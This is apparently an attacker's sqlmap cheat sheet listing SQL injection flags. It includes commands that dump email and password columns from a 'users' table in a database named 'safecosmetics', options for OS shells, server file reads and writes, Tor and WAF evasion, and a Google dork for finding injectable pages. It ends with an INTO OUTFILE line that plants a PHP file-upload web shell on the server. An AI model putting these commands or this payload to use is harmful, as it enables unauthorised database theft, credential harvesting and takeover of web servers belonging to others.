python sqlmap.py -u http://
_______
--time-sec 15
--dbs
--tables -D safecosmetics
--columns -D safecosmetics -T users
--dump -D safecosmetics -T users -C email,pass

--search -C password
--data="user="							//POST
\ --file-read="/var/www/vurln.php"
\ --file-write "x.txt" --file-dest "/var/www"
--tamper "space2morehash.py"

--sql-shell
--os-shell
--os-cmd=
--os-pwn
--os-smbrelay
--os-bof
 --msf-path=MSFPATH
--exclude-sysdbs --dump-all
-g “inurl:index.php?id=”

--proxy=PROXY
--tor=ADDRESS
--tor-port=PORT
--check-waf	--identify-waf
--crawl=DEPTH
--random-agent

-o
--predict-output
--keep-alive
--null-connection
--threads=1-10
--dbms=mysql
--level=1-5
--risk=1-3

-c CONFIGFILE
-m BULKFILE
--cookie=
--load-cookies=
--user-agent=
--referer=
--headers=
--auth-cred=name:password
--check-tor
--delay=
--timeout=
--retries=
--randomize=PARAM
--technique=
--union-cols=

.::[Enumeration]::.
-a	--all
-b	--banner
--current-user
--current-db
--hostname
--users	--passwords

.::[Registry]::.
--reg-read
--reg-add
--reg-del
--reg-key=KEY
--reg-value=VAL
--reg-data=DATA
--reg-type=TYPE

--output-dir=
--fresh-queries
--flush-session
--dump-format=
-s
-t
--batch
--charset=
--parse-errors
--save
--updateUpdate
--dependencies
--gpage=X

--mobileImitate
--page-rank
--purge-output
--smart

SELECT 0x INTO OUTFILE "/public_html/upload.php";
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>